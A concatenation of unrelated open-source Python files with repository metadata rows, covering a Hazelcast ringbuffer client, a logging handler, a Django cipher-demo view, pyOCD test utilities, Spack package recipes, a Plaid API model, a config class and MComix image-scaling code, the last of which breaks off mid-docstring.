request = ringbuffer_tail_sequence_codec.encode_request(self.name)
return self._invoke(request, ringbuffer_tail_sequence_codec.decode_response)
def head_sequence(self):
"""Returns the sequence of the head.
The head is the side of the Ringbuffer where the oldest items in the
Ringbuffer are found. If the Ringbuffer is empty, the head will be one
more than the tail. The initial value of the head is ``0`` (``1`` more
than tail).
Returns:
hazelcast.future.Future[int]: The sequence of the head.
"""
request = ringbuffer_head_sequence_codec.encode_request(self.name)
return self._invoke(request, ringbuffer_head_sequence_codec.decode_response)
def remaining_capacity(self):
"""Returns the remaining capacity of the Ringbuffer.
Returns:
hazelcast.future.Future[int]: The remaining capacity of Ringbuffer.
"""
request = ringbuffer_remaining_capacity_codec.encode_request(self.name)
return self._invoke(request, ringbuffer_remaining_capacity_codec.decode_response)
def add(self, item, overflow_policy=OVERFLOW_POLICY_OVERWRITE):
"""Adds the specified item to the tail of the Ringbuffer.
If there is no space in the Ringbuffer, the action is determined by
``overflow_policy`` as :const:`OVERFLOW_POLICY_OVERWRITE` or
:const:`OVERFLOW_POLICY_FAIL`.
Args:
item: The specified item to be added.
overflow_policy (int): the OverflowPolicy to be used when there is
no space.
Returns:
hazelcast.future.Future[int]: The sequenceId of the added item, or
``-1`` if the add failed.
"""
item_data = self._to_data(item)
request = ringbuffer_add_codec.encode_request(self.name, overflow_policy, item_data)
return self._invoke(request, ringbuffer_add_codec.decode_response)
def add_all(self, items, overflow_policy=OVERFLOW_POLICY_OVERWRITE):
"""Adds all of the item in the specified collection to the tail of the
Ringbuffer.
This is likely to outperform multiple calls to :func:`add` due
to better io utilization and a reduced number of executed operations.
The items are added in the order of the Iterator of the collection.
If there is no space in the Ringbuffer, the action is determined by
``overflow_policy`` as :const:`OVERFLOW_POLICY_OVERWRITE` or
:const:`OVERFLOW_POLICY_FAIL`.
Args:
items (list): The specified collection which contains the items
to be added.
overflow_policy (int): The OverflowPolicy to be used when there
is no space.
Returns:
hazelcast.future.Future[int]: The sequenceId of the last written item,
                or ``-1`` if the last write failed.
"""
check_not_empty(items, "items can't be empty")
if len(items) > MAX_BATCH_SIZE:
raise AssertionError("Batch size can't be greater than %d" % MAX_BATCH_SIZE)
item_data_list = []
for item in items:
check_not_none(item, "item can't be None")
item_data_list.append(self._to_data(item))
request = ringbuffer_add_all_codec.encode_request(
self.name, item_data_list, overflow_policy
)
return self._invoke(request, ringbuffer_add_all_codec.decode_response)
def read_one(self, sequence):
"""Reads one item from the Ringbuffer.
If the sequence is one beyond the current tail, this call blocks until
an item is added. Currently it isn't possible to control how long
this call is going to block.
Args:
sequence (int): The sequence of the item to read.
Returns:
The read item.
"""
check_not_negative(sequence, "sequence can't be smaller than 0")
def handler(message):
return self._to_object(ringbuffer_read_one_codec.decode_response(message))
request = ringbuffer_read_one_codec.encode_request(self.name, sequence)
return self._invoke(request, handler)
def read_many(self, start_sequence, min_count, max_count, filter=None):
"""Reads a batch of items from the Ringbuffer.
If the number of available items after the first read item is smaller
        than the ``max_count``, these items are returned. So it could be that
        the number of items read is smaller than the ``max_count``. If there are
        fewer items available than ``min_count``, then this call blocks.
Warnings:
These blocking calls consume server memory and if there are many
calls, it can be possible to see leaking memory or
``OutOfMemoryError`` s on the server.
Reading a batch of items is likely to perform better because less
overhead is involved.
A filter can be provided to only select items that need to be read. If
the filter is ``None``, all items are read. If the filter is not
``None``, only items where the filter function returns true are
returned. Using filters is a good way to prevent getting items that
are of no value to the receiver. This reduces the amount of IO and the
number of operations being executed, and can result in a significant
performance improvement. Note that, filtering logic must be defined
on the server-side.
If the ``start_sequence`` is smaller than the smallest sequence still
available in the Ringbuffer (:func:`head_sequence`), then the smallest
available sequence will be used as the start sequence and the
minimum/maximum number of items will be attempted to be read from there
on.
If the ``start_sequence`` is bigger than the last available sequence
in the Ringbuffer (:func:`tail_sequence`), then the last available
sequence plus one will be used as the start sequence and the call will
block until further items become available and it can read at least the
minimum number of items.
Args:
start_sequence (int): The start sequence of the first item to read.
min_count (int): The minimum number of items to read.
max_count (int): The maximum number of items to read.
filter: Filter to select returned elements.
Returns:
hazelcast.future.Future[ReadResult]: The list of read items.
"""
check_not_negative(start_sequence, "sequence can't be smaller than 0")
check_not_negative(min_count, "min count can't be smaller than 0")
check_true(max_count >= min_count, "max count should be greater or equal to min count")
check_true(
max_count < MAX_BATCH_SIZE, "max count can't be greater than %d" % MAX_BATCH_SIZE
)
request = ringbuffer_read_many_codec.encode_request(
self.name, start_sequence, min_count, max_count, self._to_data(filter)
)
def handler(message):
response = ringbuffer_read_many_codec.decode_response(message)
read_count = response["read_count"]
next_seq = response["next_seq"]
items = response["items"]
item_seqs = response["item_seqs"]
return ReadResult(read_count, next_seq, items, item_seqs, self._to_object)
def continuation(future):
# Since the first call to capacity
# is cached on the client-side, doing
# a capacity check each time should not
# be a problem
capacity = future.result()
check_true(
max_count <= capacity,
"max count: %d should be smaller or equal to capacity: %d" % (max_count, capacity),
)
return self._invoke(request, handler)
return self.capacity().continue_with(continuation)
class ReadResult(ImmutableLazyDataList):
"""Defines the result of a :func:`Ringbuffer.read_many` operation."""
SEQUENCE_UNAVAILABLE = -1
"""Value returned from methods returning a sequence number when the
information is not available (e.g. because of rolling upgrade and some
members not returning the sequence).
"""
def __init__(self, read_count, next_seq, items, item_seqs, to_object):
super(ReadResult, self).__init__(items, to_object)
self._read_count = read_count
self._next_seq = next_seq
self._item_seqs = item_seqs
@property
def read_count(self):
"""int: The number of items that have been read before filtering.
If no filter is set, then the :attr:`read_count` will be equal to
:attr:`size`.
But if a filter is applied, it could be that items are read, but are
filtered out. So, if you are trying to make another read based on
this, then you should increment the sequence by :attr:`read_count` and
not by :attr:`size`.
Otherwise you will be re-reading the same filtered messages.
"""
return self._read_count
@property
def size(self):
"""int: The result set size.
See Also:
:attr:`read_count`
"""
return len(self._list_data)
@property
def next_sequence_to_read_from(self):
"""int: The sequence of the item following the last read item.
This sequence can then be used to read items following the ones
returned by this result set.
Usually this sequence is equal to the sequence used to retrieve this
result set incremented by the :attr:`read_count`. In cases when the
reader tolerates lost items, this is not the case.
For instance, if the reader requests an item with a stale sequence (one
which has already been overwritten), the read will jump to the oldest
sequence and read from there.
Similarly, if the reader requests an item in the future (e.g. because
the partition was lost and the reader was unaware of this), the read
method will jump back to the newest available sequence.
Because of these jumps and only in the case when the reader is loss
tolerant, the next sequence must be retrieved using this method.
A return value of :const:`SEQUENCE_UNAVAILABLE` means that the
information is not available.
"""
return self._next_seq
def get_sequence(self, index):
"""Return the sequence number for the item at the given index.
Args:
index (int): The index.
Returns:
int: The sequence number for the ringbuffer item.
"""
return self._item_seqs[index]
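# Illustrative usage sketch (not part of the proxy implementation). It assumes a
# reachable Hazelcast cluster and the public ``hazelcast.HazelcastClient`` API; the
# ringbuffer name and payloads below are placeholders.
def _example_ringbuffer_usage():  # pragma: no cover - documentation sketch only
    import hazelcast
    client = hazelcast.HazelcastClient()
    # blocking() resolves every returned future synchronously.
    rb = client.get_ringbuffer("example-ringbuffer").blocking()
    sequence = rb.add("item-1", OVERFLOW_POLICY_FAIL)
    if sequence != -1:
        # Read back the item that was just appended.
        print(rb.read_one(sequence))
    # Read up to 10 items starting at the head without blocking (min_count=0).
    result = rb.read_many(rb.head_sequence(), 0, 10)
    print(result.read_count)
    client.shutdown()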
| hazelcast/hazelcast-python-client | hazelcast/proxy/ringbuffer.py | Python | apache-2.0 | 15,194 |
# _logger.py
import logging
import _database as _db
__version__ = '0.0.1'
class SQLAlchemyHandler(logging.Handler):
# A very basic logger that commits a LogRecord to the SQL Db
def emit(self, record):
session = _db.ConnectToDatabase()
        log = _db.Log(
            logger=record.filename,
            level=record.levelname,
            msg=record.msg,
        )
session.add(log)
session.commit()
session.close()
log = logging.getLogger('root')
log.debug('Logging Module Initialized.')
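# Illustrative wiring sketch (assumes the _database module imported above provides the
# ConnectToDatabase() session factory and Log model used by the handler).
def _example_attach_handler():  # not called anywhere; documentation sketch only
    handler = SQLAlchemyHandler()
    handler.setLevel(logging.WARNING)
    logging.getLogger('root').addHandler(handler)
    # This record would now be committed to the Log table by SQLAlchemyHandler.emit().
    logging.getLogger('root').warning('disk usage above threshold')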
| Hakugin/TimeClock | _logger.py | Python | gpl-2.0 | 581 |
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libstego. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2009 2010 by Marko Krause <[email protected]>
from django.shortcuts import get_object_or_404, render_to_response
from .models import (
AESEncryptForm,
AESDecryptForm,
SimpleEncryptForm,
SimpleDecryptForm,
RSAEncryptForm,
RSADecryptForm,
SimplestForm,
CaesarEncryptForm,
CaesarDecryptForm,
AffineEncryptForm,
AffineDecryptForm,
)
from .cryptointerface import (
desEncrypt,
desDecrypt,
aesEncrypt,
aesDecrypt,
rsaEncrypt,
rsaDecrypt,
xorEncrypt,
xorDecrypt,
atbaschEncrypt,
caesarEncrypt,
caesarDecrypt,
affineEncrypt,
affineDecrypt,
keygen,
)
from base_app.models import Algo, ManPage
def algo(request, algo_name):
output = ""
cypher = ""
algo_object = get_object_or_404(Algo, shortTitle=algo_name)
manual = get_object_or_404(ManPage, algo=algo_object)
cypherFormDict = {
"aes": AESEncryptForm,
"des": AESEncryptForm,
"xor": SimpleEncryptForm,
"rsa": RSAEncryptForm,
"atbasch": SimplestForm,
"caesar": CaesarEncryptForm,
"affine": AffineEncryptForm,
}
decypherFormDict = {
"aes": AESDecryptForm,
"des": AESDecryptForm,
"xor": SimpleDecryptForm,
"rsa": RSADecryptForm,
"atbasch": None,
"caesar": CaesarDecryptForm,
"affine": AffineDecryptForm,
}
if request.method == "POST":
if "keygen" in request.POST:
return keygen()
# encrypt
elif "submit1" in request.POST:
algoDict = {
"aes": aesEncrypt,
"des": desEncrypt,
"xor": xorEncrypt,
"rsa": rsaEncrypt,
"atbasch": atbaschEncrypt,
"caesar": caesarEncrypt,
"affine": affineEncrypt,
}
cypherForm = cypherFormDict[algo_name](request.POST)
if decypherFormDict[algo_name]:
decypherForm = decypherFormDict[algo_name]()
else:
decypherForm = None
if cypherForm.is_valid():
output, cypher = algoDict[algo_name](request)
# decrypt
elif "submit2" in request.POST:
algoDict = {
"aes": aesDecrypt,
"des": desDecrypt,
"xor": xorDecrypt,
"rsa": rsaDecrypt,
"caesar": caesarDecrypt,
"affine": affineDecrypt,
}
cypherForm = cypherFormDict[algo_name]()
decypherForm = decypherFormDict[algo_name](request.POST)
if decypherForm.is_valid():
cypher = algoDict[algo_name](request)
else:
cypherForm = cypherFormDict[algo_name]()
if decypherFormDict[algo_name]:
decypherForm = decypherFormDict[algo_name]()
else:
decypherForm = None
return render_to_response(
"crypto_algo.html",
{
"algo": algo_object,
"output": output,
"cypher": cypher,
"decypherForm": decypherForm,
"cypherForm": cypherForm,
"algo_type": "Kryptographie",
"manual": manual,
},
)
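# Illustrative URLconf sketch (belongs in a hypothetical urls.py, not in this module;
# the URL pattern and name are assumptions about how the view gets wired up):
#     from django.conf.urls import url
#     from crypto.views import algo
#     urlpatterns = [
#         url(r'^crypto/(?P<algo_name>\w+)/$', algo, name='crypto_algo'),
#     ]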
| zeratul2099/crypt_app | crypto/views.py | Python | gpl-3.0 | 3,975 |
# pyOCD debugger
# Copyright (c) 2015-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import logging
import os
import sys
import traceback
from xml.etree import ElementTree
import six
import subprocess
import tempfile
import threading
from pyocd.utility.compatibility import to_str_safe
isPy2 = (sys.version_info[0] == 2)
OBJCOPY = "arm-none-eabi-objcopy"
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
PYOCD_DIR = os.path.dirname(TEST_DIR)
TEST_DATA_DIR = os.path.join(TEST_DIR, "data")
def get_test_binary_path(binary_name):
return os.path.join(TEST_DATA_DIR, "binaries", binary_name)
def get_env_name():
return os.environ.get('TOX_ENV_NAME', '')
def get_env_file_name():
env_name = get_env_name()
return ("_" + env_name) if env_name else ''
# Returns common option values passed in when creating test sessions.
def get_session_options():
return {
# These options can be overridden by probe config in pyocd.yaml.
'option_defaults': {
'frequency': 1000000, # 1 MHz
'skip_test': False,
},
}
# Returns a dict containing some test parameters for the target in the passed-in session.
#
# 'test_clock' : the max supported SWD frequency for the target
# 'error_on_invalid_access' : whether invalid accesses cause a fault
#
def get_target_test_params(session):
target_type = session.board.target_type
error_on_invalid_access = True
if target_type in ("nrf51", "nrf52", "nrf52840"):
# Override clock since 10MHz is too fast
test_clock = 1000000
error_on_invalid_access = False
elif target_type == "ncs36510":
# Override clock since 10MHz is too fast
test_clock = 1000000
else:
# Default of 10 MHz. Most probes will not actually run this fast, but this
# sets them to their max supported frequency.
test_clock = 10000000
return {
'test_clock': test_clock,
'error_on_invalid_access': error_on_invalid_access,
}
# Generate an Intel hex file from the binary test file.
def binary_to_hex_file(binary_file, base_address):
temp_test_hex_name = tempfile.mktemp('.hex')
objcopyOutput = subprocess.check_output([OBJCOPY,
"-v", "-I", "binary", "-O", "ihex", "-B", "arm", "-S",
"--set-start", "0x%x" % base_address,
"--change-addresses", "0x%x" % base_address,
binary_file, temp_test_hex_name], stderr=subprocess.STDOUT)
print(to_str_safe(objcopyOutput))
# Need to escape backslashes on Windows.
if sys.platform.startswith('win'):
temp_test_hex_name = temp_test_hex_name.replace('\\', '\\\\')
return temp_test_hex_name
# Generate an elf from the binary test file.
def binary_to_elf_file(binary_file, base_address):
temp_test_elf_name = tempfile.mktemp('.elf')
objcopyOutput = subprocess.check_output([OBJCOPY,
"-v", "-I", "binary", "-O", "elf32-littlearm", "-B", "arm", "-S",
"--set-start", "0x%x" % base_address,
"--change-addresses", "0x%x" % base_address,
binary_file, temp_test_elf_name], stderr=subprocess.STDOUT)
print(to_str_safe(objcopyOutput))
# Need to escape backslashes on Windows.
if sys.platform.startswith('win'):
temp_test_elf_name = temp_test_elf_name.replace('\\', '\\\\')
return temp_test_elf_name
def run_in_parallel(function, args_list):
"""Create and run a thread in parallel for each element in args_list
Wait until all threads finish executing. Throw an exception if an exception
occurred on any of the threads.
"""
def _thread_helper(idx, func, args):
"""Run the function and set result to True if there was not error"""
func(*args)
result_list[idx] = True
result_list = [False] * len(args_list)
thread_list = []
for idx, args in enumerate(args_list):
thread = threading.Thread(target=_thread_helper,
args=(idx, function, args))
thread.start()
thread_list.append(thread)
for thread in thread_list:
thread.join()
for result in result_list:
if result is not True:
raise Exception("Running in thread failed")
class IOTee(object):
def __init__(self, *args):
self.outputs = list(args)
def add(self, output):
self.outputs.append(output)
def write(self, message):
if isPy2 and isinstance(message, str):
message = message.decode('UTF-8')
for out in self.outputs:
out.write(message)
def flush(self):
for out in self.outputs:
out.flush()
class RecordingLogHandler(logging.Handler):
def __init__(self, iostream, level=logging.NOTSET):
super(RecordingLogHandler, self).__init__(level)
self.stream = iostream
def emit(self, record):
try:
message = self.format(record)
if isPy2 and isinstance(message, unicode):
message = message.encode('UTF-8')
self.stream.write(six.u(message + "\n"))
except:
self.handleError(record)
class TestResult(object):
def __init__(self, test_board, test, result):
self.passed = result
self._board = test_board.target_type if test_board else 'unknown'
self.board_name = test_board.name if test_board else ""
self.test = test
self.name = "test"
self.time = 0
self.output = ""
@property
def board(self):
return self._board
@board.setter
def board(self, newBoard):
self._board = newBoard.target_type if newBoard else 'unknown'
self.board_name = newBoard.name
def get_test_case(self):
if 'TOX_ENV_NAME' in os.environ:
classname = "{}.{}.{}.{}".format(os.environ['TOX_ENV_NAME'], self.board_name, self.board, self.name)
else:
classname = "{}.{}.{}".format(self.board_name, self.board, self.name)
case = ElementTree.Element('testcase',
name=self.name,
classname=classname,
status=("passed" if self.passed else "failed"),
time="%.3f" % self.time
)
case.text = "\n"
case.tail = "\n"
if not self.passed:
failed = ElementTree.SubElement(case, 'failure',
message="failure",
type="failure"
)
system_out = ElementTree.SubElement(case, 'system-out')
system_out.text = self.output
return case
class Test(object):
def __init__(self, name, function):
self.name = name
self.test_function = function
def run(self, board):
"""
Run test and return the result
Override this function to return a custom result
"""
passed = False
try:
self.test_function(board.unique_id)
passed = True
except Exception as e:
print("Exception %s when testing board %s" % (e, board.unique_id))
traceback.print_exc(file=sys.stdout)
result = TestResult(board, self, passed)
result.name = self.name
return result
def print_perf_info(self, result_list, output_file=None):
"""
Print performance info if any
"""
pass
@staticmethod
def print_results(result_list, output_file=None):
msg_format_str = "{:<15}{:<21}{:<15}{:<15}"
print("\n\n------ TEST RESULTS ------")
        print(msg_format_str.format("Target", "Test", "Result", "Time"),
              file=output_file)
print("", file=output_file)
for result in result_list:
status_str = "Pass" if result.passed else "Fail"
print(msg_format_str.format(result.board,
result.test.name,
status_str, "%.3f" % result.time),
file=output_file)
@staticmethod
def all_tests_pass(result_list):
passed = True
for result in result_list:
if not result.passed:
passed = False
break
if len(result_list) <= 0:
passed = False
return passed
| mbedmicro/pyOCD | test/test_util.py | Python | apache-2.0 | 8,912 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Hsakmt(AutotoolsPackage):
"""hsakmt is a thunk library that provides a userspace interface to amdkfd
(AMD's HSA Linux kernel driver). It is the HSA equivalent of libdrm."""
homepage = "https://cgit.freedesktop.org/amd/hsakmt/"
url = "https://www.x.org/archive/individual/lib/hsakmt-1.0.0.tar.gz"
version('1.0.0', '9beb20104e505300daf541266c4c3c3d')
| skosukhin/spack | var/spack/repos/builtin/packages/hsakmt/package.py | Python | lgpl-2.1 | 1,639 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyNistats(PythonPackage):
"""Modeling and Statistical analysis of fMRI data in Python."""
homepage = "https://github.com/nilearn/nistats"
pypi = "nistats/nistats-0.0.1rc0.tar.gz"
version('0.0.1rc0', sha256='dcc4c4e410f542fd72e02e12b3b6531851bae2680d08ad29658b272587ef2f98')
version('0.0.1b2', sha256='a853149087bafbf1bed12664ed8889a63ff15dde1fb7a9d51e8a094afc8d695d')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
# needs +plotting to avoid ModuleNotFoundError:
# 'nilearn.plotting.js_plotting_utils' when importing nistats.reporting
# Functionality has been incorporated into [email protected]:
depends_on('[email protected]:0.6', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/py-nistats/package.py | Python | lgpl-2.1 | 1,272 |
"""
The Plaid API
The Plaid REST API. Please see https://plaid.com/docs/api for more details. # noqa: E501
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from plaid.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from plaid.model.transactions_rule_field import TransactionsRuleField
from plaid.model.transactions_rule_type import TransactionsRuleType
globals()['TransactionsRuleField'] = TransactionsRuleField
globals()['TransactionsRuleType'] = TransactionsRuleType
class TransactionsRuleDetails(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'field': (TransactionsRuleField,), # noqa: E501
'type': (TransactionsRuleType,), # noqa: E501
'query': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'field': 'field', # noqa: E501
'type': 'type', # noqa: E501
'query': 'query', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, field, type, query, *args, **kwargs): # noqa: E501
"""TransactionsRuleDetails - a model defined in OpenAPI
Args:
field (TransactionsRuleField):
type (TransactionsRuleType):
query (str): For TRANSACTION_ID field, provide transaction_id. For NAME field, provide a string pattern.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.field = field
self.type = type
self.query = query
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
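# Illustrative construction sketch (not generated code). The enum values shown are
# assumptions based on the attribute docstring above; consult TransactionsRuleField and
# TransactionsRuleType for the values actually accepted by the Plaid API.
#     from plaid.model.transactions_rule_field import TransactionsRuleField
#     from plaid.model.transactions_rule_type import TransactionsRuleType
#     rule = TransactionsRuleDetails(
#         field=TransactionsRuleField('NAME'),
#         type=TransactionsRuleType('SUBSTRING_MATCH'),
#         query='Starbucks',
#     )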
| plaid/plaid-python | plaid/model/transactions_rule_details.py | Python | mit | 7,204 |
# ------------------------------------------------------------------------------
# Config
# ------------------------------------------------------------------------------
import os
class BaseConfig():
basedir = os.path.abspath(os.path.dirname(__file__))
# Should the application be in debug mode?
DEBUG = os.getenv('DEBUG', True)
# Host, port
#SERVER_NAME = '%s:%s' % (os.getenv("HOSTNAME", "0.0.0.0"), os.getenv("PORT", 8080))
# Database
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
class ProductionConfig(BaseConfig):
DEBUG = False
    SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URI')
 | wazts/user-manager | config.py | Python | gpl-2.0 | 663
"""image_tools.py - Various image manipulations."""
import sys
import os
import operator
import itertools
import bisect
import gtk
import Image
import ImageEnhance
import ImageOps
from mcomix.preferences import prefs
# File formats supported by PyGTK (sorted list of extensions)
_supported_formats = sorted(
[ extension.lower() for extlist in
itertools.imap(operator.itemgetter("extensions"),
gtk.gdk.pixbuf_get_formats())
for extension in extlist])
def fit_in_rectangle(src, width, height, scale_up=False, rotation=0):
"""Scale (and return) a pixbuf so that it fits in a rectangle with
dimensions <width> x <height>. A negative <width> or <height>
means an unbounded dimension - both cannot be negative.
If <rotation> is 90, 180 or 270 we rotate <src> first so that the
rotated pixbuf is fitted in the rectangle.
Unless <scale_up> is True we don't stretch images smaller than the
given rectangle.
If <src> has an alpha channel it gets a checkboard background.
"""
# "Unbounded" really means "bounded to 10000 px" - for simplicity.
# MComix would probably choke on larger images anyway.
if width < 0:
width = 100000
elif height < 0:
height = 100000
width = max(width, 1)
height = max(height, 1)
if rotation in (90, 270):
width, height = height, width
src_width = src.get_width()
src_height = src.get_height()
if not scale_up and src_width <= width and src_height <= height:
if src.get_has_alpha():
if prefs['checkered bg for transparent images']:
src = src.composite_color_simple(src_width, src_height,
gtk.gdk.INTERP_TILES, 255, 8, 0x777777, 0x999999)
else:
src = src.composite_color_simple(src_width, src_height,
gtk.gdk.INTERP_TILES, 255, 1024, 0xFFFFFF, 0xFFFFFF)
else:
if float(src_width) / width > float(src_height) / height:
height = int(max(src_height * width / src_width, 1))
else:
width = int(max(src_width * height / src_height, 1))
if src.get_has_alpha():
if prefs['checkered bg for transparent images']:
src = src.composite_color_simple(width, height,
gtk.gdk.INTERP_TILES, 255, 8, 0x777777, 0x999999)
else:
src = src.composite_color_simple(width, height,
gtk.gdk.INTERP_TILES, 255, 1024, 0xFFFFFF, 0xFFFFFF)
else:
src = src.scale_simple(width, height, gtk.gdk.INTERP_TILES)
if rotation == 90:
src = src.rotate_simple(gtk.gdk.PIXBUF_ROTATE_CLOCKWISE)
elif rotation == 180:
src = src.rotate_simple(gtk.gdk.PIXBUF_ROTATE_UPSIDEDOWN)
elif rotation == 270:
src = src.rotate_simple(gtk.gdk.PIXBUF_ROTATE_COUNTERCLOCKWISE)
return src
def fit_2_in_rectangle(src1, src2, width, height, scale_up=False,
rotation1=0, rotation2=0):
"""Scale two pixbufs so that they fit together (side-by-side) into a
rectangle with dimensions <width> x <height>, with a 2 px gap.
If one pixbuf does not use all of its allotted space, the other one
is given it, so that the pixbufs are not necessarily scaled to the
same percentage.
The pixbufs are rotated according to the angles in <rotation1> and
<rotation2> before they are scaled.
See fit_in_rectangle() for more info on the parameters.
"""
# "Unbounded" really means "bounded to 10000 px" - for simplicity.
# MComix would probably choke on larger images anyway.
if width < 0:
width = 10000
elif height < 0:
height = 10000
width -= 2 # We got a 2 px gap between images
width = max(width, 2) # We need at least 1 px per image
height = max(height, 1)
src1_width = src1.get_width()
src1_height = src1.get_height()
src2_width = src2.get_width()
src2_height = src2.get_height()
if rotation1 in (90, 270):
src1_width, src1_height = src1_height, src1_width
if rotation2 in (90, 270):
src2_width, src2_height = src2_height, src2_width
total_width = src1_width + src2_width
alloc_width_src1 = max(src1_width * width / total_width, 1)
alloc_width_src2 = max(src2_width * width / total_width, 1)
needed_width_src1 = round(src1_width *
min(height / float(src1_height), alloc_width_src1 / float(src1_width)))
needed_width_src2 = round(src2_width *
min(height / float(src2_height), alloc_width_src2 / float(src2_width)))
if needed_width_src1 < alloc_width_src1:
alloc_width_src2 += alloc_width_src1 - needed_width_src1
elif needed_width_src1 >= alloc_width_src1:
alloc_width_src1 += alloc_width_src2 - needed_width_src2
return (fit_in_rectangle(src1, int(alloc_width_src1), height,
scale_up, rotation1),
fit_in_rectangle(src2, int(alloc_width_src2), height,
scale_up, rotation2))
def add_border(pixbuf, thickness, colour=0x000000FF):
"""Return a pixbuf from <pixbuf> with a <thickness> px border of
<colour> added.
"""
canvas = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8,
pixbuf.get_width() + thickness * 2,
pixbuf.get_height() + thickness * 2)
canvas.fill(colour)
pixbuf.copy_area(0, 0, pixbuf.get_width(), pixbuf.get_height(),
canvas, thickness, thickness)
return canvas
def get_most_common_edge_colour(pixbufs, edge=2):
"""Return the most commonly occurring pixel value along the four edges
of <pixbuf>. The return value is a sequence, (r, g, b), with 16 bit
